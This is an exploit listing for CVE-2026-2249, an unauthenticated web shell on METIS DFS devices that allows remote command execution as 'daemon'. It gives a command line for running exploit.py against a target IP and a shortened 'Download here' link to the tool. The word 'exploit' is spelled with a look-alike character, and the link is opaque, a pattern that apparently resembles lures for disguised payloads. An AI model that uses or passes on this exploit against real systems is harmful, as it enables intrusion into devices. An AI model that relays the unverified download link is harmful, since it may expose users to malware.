Share
## https://sploitus.com/exploit?id=E73772E3-1659-587D-8B4A-FE6FF871616F
## Overview
The METIS DFS devices, specifically in versions lower than or equal to oscore 2.1.234-r18, feature a critical vulnerability where an unauthenticated web-based shell is exposed at the /console endpoint.


## Details
- **CVE ID**: [# CVE-2026-2249](https://nvd.nist.gov/vuln/detail/CVE-2026-2249)
- **Discovered**: 2026-02-11
- **Published**: 2026-02-11

## Vulnerability Description
This flaw allows remote attackers to execute arbitrary operating system commands with elevated 'daemon' privileges. The implications of this vulnerability include unauthorized configuration changes, potential data breaches, and the ability to disrupt essential services.

## Running

To run explоit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```

### [Download here](https://tinyurl.com/3237n9yr)